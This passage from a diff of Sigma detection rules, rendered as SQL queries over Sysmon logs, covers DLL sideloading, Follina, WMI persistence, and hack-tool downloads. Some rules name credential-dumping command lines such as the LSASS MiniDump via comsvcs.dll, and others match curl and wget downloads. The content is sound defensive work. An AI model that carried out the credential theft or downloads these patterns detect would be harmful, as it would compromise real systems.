ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "status": "experimental", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString(%' ESCAPE '\\')) AND (CommandLine LIKE '%https://attachment.outlook.live.net/owa/%' ESCAPE '\\' OR CommandLine LIKE '%https://onenoteonlinesync.onenote.com/onenoteonlinesync/%' ESCAPE '\\'))" + "title": "WMI Persistence - Command Line Event Consumer", + "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "status": "test", + "description": "Detects WMI command line event consumers", + "author": "Thomas Patzke", + "tags": [ + "attack.t1546.003", + "attack.persistence" ], - "filename": "proc_creation_win_susp_download_office_domain.yml" + "falsepositives": [ + "Unknown (data set is too small; further testing needed)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + ], + "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" }, { - "title": "Suspicious Rundll32 Without Any CommandLine Params", - "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "title": "DLL Load By System Process From Suspicious Locations", + "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location such as C:\\Users\\Public", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070" ], "falsepositives": [ - "Possible but rare" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_no_params.yml" + "filename": "image_load_susp_dll_load_system_process.yml" }, { - "title": "HackTool - Windows Credential Editor (WCE) Execution", - "id": "7aa7009a-28b9-4344-8c1f-159489a390df", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Aruba Network Service Potential DLL Sideloading", + "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "status": "experimental", + "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Another service that uses a single -s command line switch" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_wce.yml" + "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" }, { - "title": "Suspicious IIS Module Registration", - "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", - "status": "test", - "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", - "author": "Florian Roth (Nextron Systems), Microsoft (idea)", + "title": "Potential Iviewers.DLL Sideloading", + "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", + "status": "experimental", + "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", + "author": "X__Junior (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_susp_module_registration.yml" + "filename": "image_load_side_load_iviewers.yml" }, { - "title": "HackTool - CrackMapExec Process Patterns", - "id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "title": "Microsoft Defender Loading DLL from Nondefault Path", + "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "status": "experimental", - "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tasklist /fi %' ESCAPE '\\' AND CommandLine LIKE '%Imagename eq lsass.exe%' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (CommandLine LIKE '%do rundll32.exe C:\\\\windows\\\\System32\\\\comsvcs.dll, MiniDump%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '% full%' ESCAPE '\\' AND CommandLine LIKE '%\\%\\%B%' ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" + "filename": "image_load_side_load_windows_defender.yml" }, { - "title": "Suspicious GUP Usage", - "id": "0a4f6091-223b-41f6-8743-f322ec84930b", - "status": "test", - "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "title": "Hacktool Download", + "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "status": "experimental", + "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_suspicious_execution.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "VolumeShadowCopy Symlink Creation Via Mklink", - "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", - "status": "stable", - "description": "Shadow Copies storage symbolic link creation using operating systems utilities", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", + "status": "experimental", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR 